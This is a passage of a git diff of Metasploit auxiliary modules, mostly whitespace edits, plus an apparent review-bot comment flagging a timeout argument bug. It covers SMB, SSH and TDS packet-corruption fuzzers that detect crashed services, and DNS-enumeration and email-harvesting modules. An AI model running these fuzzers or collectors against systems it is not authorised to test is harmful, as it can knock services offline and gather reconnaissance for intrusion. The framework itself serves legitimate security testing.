b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Negotiate SMB2 Dialect Corruption', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_smb_negotiate(pkt,opts={}) @connected = false connect 
@@ -41,27 +41,27 @@ class Metasploit3 < Msf::Auxiliary sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_smb_negotiate cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB negotiate packet with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_negotiate(str, 0.25) rescue ::Interrupt @@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_negotiate # The SMB 2 dialect must be there dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002'] diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 3070e89dd1..43560f1bb4 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Create Pipe Request Fuzzer', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$' )) end - + def do_smb_create(pkt,opts={}) @connected = false connect 
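Review bot: `r = do_smb_negotiate(str, 0.25)` passes a Float where `do_smb_negotiate(pkt,opts={})` expects a Hash, so `opts[:timeout]` at the top of this hunk raises NoMethodError on Float instead of applying a 0.25s timeout; presumably the rescue clauses cut from the hunk catch it and record it as `last_err`, which would make every iteration look like a failed request. The call should read `r = do_smb_negotiate(str, :timeout => 0.25)`, and `r` is never read afterwards. The same mismatch is in smb_create_pipe_corrupt.rb further down this patch (`r = do_smb_login(str, 0.25)` against `opts[:timeout]`), and smb_create_pipe.rb passes `0.25` to `do_smb_create`, whose visible lines never read `opts`, so the value is silently ignored there. `run` continues past the end of this hunk.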
@@ -37,21 +37,21 @@ class Metasploit3 < Msf::Auxiliary @connected = true smb_create("\\" + pkt) end - + def run last_str = nil last_inp = nil last_err = nil - + cnt = 0 fuzz_strings do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin do_smb_create(str, 0.25) rescue ::Interrupt @@ -62,16 +62,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index f2d79b8672..aae843d002 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Create Pipe Request Corruption', 
@@ -32,43 +32,43 @@ class Metasploit3 < Msf::Auxiliary
 OptString.new('SMBPIPE', [true, 'Specify the pipe name to corrupt', "\\BROWSER"])
 ], self.class)
 end
-
+
 def do_smb_login(pkt,opts={})
 @connected = false
 connect
 smb_login
-
+
 @connected = true
 sock.put(pkt)
 sock.get_once(-1, opts[:timeout])
 end
-
+
 def run
-
+
 # Connect in order to get the server-assigned user-id/tree-id
 connect
 smb_login
 pkt = make_smb_create
 disconnect
-
+
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SMB create pipe with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_smb_login(str, 0.25)
 rescue ::Interrupt
@@ -79,42 +79,42 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 last_str = str
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_smb_create
 filename = datastore['SMBPIPE']
 disposition = 1
 impersonation = 2
-
+
 pkt = Rex::Proto::SMB::Constants::SMB_CREATE_PKT.make_struct
 self.simple.client.smb_defaults(pkt['Payload']['SMB'])
-
+
 pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NT_CREATE_ANDX
 pkt['Payload']['SMB'].v['Flags1'] = 0x18
 pkt['Payload']['SMB'].v['Flags2'] = 0x2001
 pkt['Payload']['SMB'].v['WordCount'] = 24
-
+
 pkt['Payload'].v['AndX'] = 255
 pkt['Payload'].v['FileNameLen'] = filename.length
 pkt['Payload'].v['CreateFlags'] = 0x16
 pkt['Payload'].v['AccessMask'] = 0x02000000 # Maximum Allowed
 pkt['Payload'].v['ShareAccess'] = 7
 pkt['Payload'].v['CreateOptions'] = 0
- pkt['Payload'].v['Impersonation'] = impersonation
+ pkt['Payload'].v['Impersonation'] = impersonation
 pkt['Payload'].v['Disposition'] = disposition
 pkt['Payload'].v['Payload'] = filename + "\x00"
 pkt.to_s
diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
index 487debedf6..aa9deb06e0 100644
--- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
+++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SMB Negotiate Dialect Corruption',
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
 OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
 ], self.class)
 end
-
+
 def do_smb_negotiate(pkt,opts={})
 @connected = false
 connect
@@ -40,27 +40,27 @@ class Metasploit3 < Msf::Auxiliary
 sock.put(pkt)
 sock.get_once(-1, opts[:timeout])
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_smb_negotiate
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SMB negotiate packet with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_smb_negotiate(str, 0.25)
 rescue ::Interrupt
@@ -71,21 +71,21 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 last_str = str
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_smb_negotiate
 # The SMB 2 dialect must be there
 dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12']
diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
index 57d40f8885..9abf2f2b21 100644
--- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
+++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::SMB
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SMB NTLMv1 Login Request Corruption',
@@ -33,37 +33,37 @@ class Metasploit3 < Msf::Auxiliary
 OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
 ], self.class)
 end
-
+
 def do_smb_login(pkt,opts={})
 @connected = false
 connect
 simple.client.negotiate(false)
-
+
 @connected = true
 sock.put(pkt)
 sock.get_once(-1, opts[:timeout])
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_smb_login
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SMB login with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_smb_login(str, 0.25)
 rescue ::Interrupt
@@ -74,23 +74,23 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 last_str = str
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_smb_login
-
+
 user = "USER"
 domain = "DOMAIN"
 hash_lm = Rex::Proto::SMB::Crypt.lanman_des("X", "X" * 8)
@@ -102,10 +102,10 @@ class Metasploit3 < Msf::Auxiliary
 data << user + "\x00"
 data << domain + "\x00"
 data << 'Windows 2000 2195' + "\x00"
- data << 'Windows 2000 5.0' + "\x00"
-
+ data << 'Windows 2000 5.0' + "\x00"
+
 pkt = Rex::Proto::SMB::Constants::SMB_SETUP_NTLMV1_PKT.make_struct
-
+
 pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_SESSION_SETUP_ANDX
 pkt['Payload']['SMB'].v['Flags1'] = 0x18
 pkt['Payload']['SMB'].v['Flags2'] = 0x2001
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
 pkt['Payload'].v['AndX'] = 255
 pkt['Payload'].v['MaxBuff'] = 0xffdf
 pkt['Payload'].v['MaxMPX'] = 2
- pkt['Payload'].v['VCNum'] = 1
+ pkt['Payload'].v['VCNum'] = 1
 pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
 pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
 pkt['Payload'].v['Capabilities'] = 64
diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
index d75b407036..facd1c6265 100644
--- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
+++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SSH 1.5 Version Fuzzer',
@@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary
 Opt::RPORT(22)
 ], self.class)
 end
-
+
 def do_ssh_version(pkt,opts={})
 @connected = false
 connect
 @connected = true
-
+
 @banner = sock.get_once(-1,opts[:banner_timeout])
 return if not @banner
 sock.put("#{pkt}\r\n")
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 ver = make_ssh_version_base
 cnt = 0
-
+
 fuzz_strings do |str|
 cnt += 1
-
+
 pkt = ver + str
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_ssh_version(str,:banner_timeout => 5)
 rescue ::Interrupt
@@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 if(not @banner)
 print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
 return
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_ssh_version_base
 "SSH-1.5-"
 end
diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
index a5db375c7b..772c505ba2 100644
--- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
+++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SSH 2.0 Version Fuzzer',
@@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary
 Opt::RPORT(22)
 ], self.class)
 end
-
+
 def do_ssh_version(pkt,opts={})
 @connected = false
 connect
 @connected = true
-
+
 @banner = sock.get_once(-1,opts[:banner_timeout])
 return if not @banner
 sock.put("#{pkt}\r\n")
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 ver = make_ssh_version_base
 cnt = 0
-
+
 fuzz_strings do |str|
 cnt += 1
-
+
 pkt = ver + str
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_ssh_version(str,:banner_timeout => 5)
 rescue ::Interrupt
@@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 if(not @banner)
 print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
 return
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_ssh_version_base
 "SSH-2.0-"
 end
diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
index 563165f4a5..0da62810b3 100644
--- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
+++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SSH Version Corruption',
@@ -32,37 +32,37 @@ class Metasploit3 < Msf::Auxiliary
 OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
 ], self.class)
 end
-
+
 def do_ssh_version(pkt,opts={})
 @connected = false
 connect
 @connected = true
-
+
 @banner = sock.get_once(-1,opts[:banner_timeout])
 return if not @banner
 sock.put("#{pkt}\r\n")
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_ssh_version
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SSH version string with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_ssh_version(str,:banner_timeout => 5)
 rescue ::Interrupt
@@ -73,16 +73,16 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 if(not @banner)
 print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
 return
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_ssh_version
 "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1"
 end
diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
index e79d655b6c..d8ed8b7eef 100644
--- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
+++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'TDS Protocol Login Request Corruption Fuzzer',
@@ -31,11 +31,11 @@ class Metasploit3 < Msf::Auxiliary
 # A copy of the mssql_login method with the ability to overload each option
 def make_login(opts={})
-
+
 pkt = ""
 idx = 0
 db = ""
-
+
 pkt << [
 0x00000000, # Dummy size
 opts[:tds_version] || 0x71000001, # TDS Version
@@ -50,42 +50,42 @@ class Metasploit3 < Msf::Auxiliary
 opts[:timezone] || 0x00000000, # Time Zone
 opts[:collation] || 0x00000000 # Collation
 ].pack('VVVVVVCCCCVV')
-
-
+
+
 cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
 pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
- aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
+ aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 sname = Rex::Text.to_unicode( opts[:sname] || rhost )
 dname = Rex::Text.to_unicode( opts[:dname] || db )
-
+
 idx = pkt.size + 50 # lengths below
-
+
 pkt << [idx, cname.length / 2].pack('vv')
 idx += cname.length
-
+
 pkt << [idx, uname.length / 2].pack('vv')
- idx += uname.length
-
+ idx += uname.length
+
 pkt << [idx, pname.length / 2].pack('vv')
 idx += pname.length
 pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
-
+ idx += aname.length
+
 pkt << [idx, sname.length / 2].pack('vv')
 idx += sname.length
-
+
 pkt << [0, 0].pack('vv')
-
+
 pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
+ idx += aname.length
 pkt << [idx, 0].pack('vv')
-
+
 pkt << [idx, dname.length / 2].pack('vv')
- idx += dname.length
-
+ idx += dname.length
+
 # The total length has to be embedded twice more here
 pkt << [
 0,
@@ -93,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary
 0x12345678,
 0x12345678
 ].pack('vVVV')
-
+
 pkt << cname
 pkt << uname
 pkt << pname
- pkt << aname
+ pkt << aname
 pkt << sname
 pkt << aname
 pkt << dname
-
+
 # Total packet length
 pkt[0,4] = [pkt.length].pack('V')
@@ -113,34 +113,34 @@ class Metasploit3 < Msf::Auxiliary
 pkt
 end
-
+
 def do_login(pkt,opts={})
 @connected = false
 disconnect if self.sock
 connect
 @connected = true
-
+
 resp = mssql_send_recv(pkt,opts[:timeout])
-
+
 info = {:errors => []}
 info = mssql_parse_reply(resp,info)
 info
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_login
 cnt = 0
 fuzz_string_corrupt_byte_reverse(pkt) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 do_login(str,:timeout => 0.50)
 rescue ::Interrupt
@@ -151,12 +151,12 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb
index ddf05286a3..27f8403e04 100644
--- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb
+++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'TDS Protocol Login Request Username Fuzzer',
@@ -31,16 +31,16 @@ class Metasploit3 < Msf::Auxiliary
 # A copy of the mssql_login method with the ability to overload each option
 def do_login(opts={})
-
+
 @connected = false
 disconnect if self.sock
 connect
 @connected = true
-
+
 pkt = ""
 idx = 0
 db = ""
-
+
 pkt << [
 0x00000000, # Dummy size
 opts[:tds_version] || 0x71000001, # TDS Version
@@ -55,42 +55,42 @@ class Metasploit3 < Msf::Auxiliary
 opts[:timezone] || 0x00000000, # Time Zone
 opts[:collation] || 0x00000000 # Collation
 ].pack('VVVVVVCCCCVV')
-
-
+
+
 cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
 pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
- aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
+ aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 sname = Rex::Text.to_unicode( opts[:sname] || rhost )
 dname = Rex::Text.to_unicode( opts[:dname] || db )
-
+
 idx = pkt.size + 50 # lengths below
-
+
 pkt << [idx, cname.length / 2].pack('vv')
 idx += cname.length
-
+
 pkt << [idx, uname.length / 2].pack('vv')
- idx += uname.length
-
+ idx += uname.length
+
 pkt << [idx, pname.length / 2].pack('vv')
 idx += pname.length
 pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
-
+ idx += aname.length
+
 pkt << [idx, sname.length / 2].pack('vv')
 idx += sname.length
-
+
 pkt << [0, 0].pack('vv')
-
+
 pkt << [idx, aname.length / 2].pack('vv')
- idx += aname.length
+ idx += aname.length
 pkt << [idx, 0].pack('vv')
-
+
 pkt << [idx, dname.length / 2].pack('vv')
- idx += dname.length
-
+ idx += dname.length
+
 # The total length has to be embedded twice more here
 pkt << [
 0,
@@ -98,15 +98,15 @@ class Metasploit3 < Msf::Auxiliary
 0x12345678,
 0x12345678
 ].pack('vVVV')
-
+
 pkt << cname
 pkt << uname
 pkt << pname
- pkt << aname
+ pkt << aname
 pkt << sname
 pkt << aname
 pkt << dname
-
+
 # Total packet length
 pkt[0,4] = [pkt.length].pack('V')
@@ -117,27 +117,27 @@ class Metasploit3 < Msf::Auxiliary
 pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
 resp = mssql_send_recv(pkt,opts[:timeout])
-
+
 info = {:errors => []}
 info = mssql_parse_reply(resp,info)
 info
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 cnt = 0
 fuzz_strings do |str|
 # capped at 16-bit lengths
 next if str.length > 65535
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 do_login(:uname => str, :timeout => 0.50)
 rescue ::Interrupt
@@ -148,12 +148,12 @@ class Metasploit3 < Msf::Auxiliary
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
diff --git a/modules/auxiliary/gather/dns_enum.rb b/modules/auxiliary/gather/dns_enum.rb
index f965748990..c38575416b 100644
--- a/modules/auxiliary/gather/dns_enum.rb
+++ b/modules/auxiliary/gather/dns_enum.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -5,28 +9,28 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 require "net/dns/resolver"
 class Metasploit3 < Msf::Auxiliary
 include Msf::Auxiliary::Report
+
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'DNS Enumeration Module',
- 'Description' => %q{ This module can be used to enumerate various types of information about a domain from a specific DNS server.
- },
- 'Author' => [ 'Carlos Perez ' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision$',
- 'References' =>
- [
- ['CVE', '1999-0532'],
- ]
- ))
+ 'Name' => 'DNS Enumeration Module',
+ 'Description' => %q{ This module can be used to enumerate various types of information about a domain from a specific DNS server.
+ },
+ 'Author' => [ 'Carlos Perez ' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['CVE', '1999-0532'],
+ ]
+ ))
+
 register_options(
 [
 OptString.new('DOMAIN', [ true, "The target domain name"]),
@@ -42,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
 OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
 OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false])
 ], self.class)
+
 register_advanced_options(
 [
 OptInt.new('THREADS', [ false, "Number of threads to use when using ENUM_BRT, ENUM_TLD, and ENUM_RVL checks", 10]),
@@ -248,7 +253,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 a.delete_if {|x| not x.alive?} while not a.empty?
 end
-
+
 #-------------------------------------------------------------------------------
 def bruteipv6(target, wordlist, nssrv)
 print_status("Brute Forcing IPv6 addresses against Domain #{target}")
@@ -493,7 +498,7 @@ class Metasploit3 < Msf::Auxiliary
 dnsbrute(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS'])
 end
 end
-
+
 if(datastore['ENUM_IP6'])
 if wldcrd & datastore['STOP_WLDCRD']
 print_status("Wilcard Record Found!")
diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb
index fbfb2c106c..22b89da109 100644
--- a/modules/auxiliary/gather/search_email_collector.rb
+++ b/modules/auxiliary/gather/search_email_collector.rb
@@ -1,4 +1,7 @@
-#!/usr/bin/env ruby
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -6,22 +9,23 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
 require 'net/http'
 class Metasploit3 < Msf::Auxiliary
 include Msf::Auxiliary::Report
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Search Engine Domain Email Address Collector',
 'Description' => %q{
- This module uses Google, Bing and Yahoo to create a list of
- valid email addresses for the target domain.
+ This module uses Google, Bing and Yahoo to create a list of
+ valid email addresses for the target domain.
 },
 'Author' => [ 'Carlos Perez ' ],
 'License' => MSF_LICENSE,
 'Version' => '$Revision$'))
+
 register_options(
 [
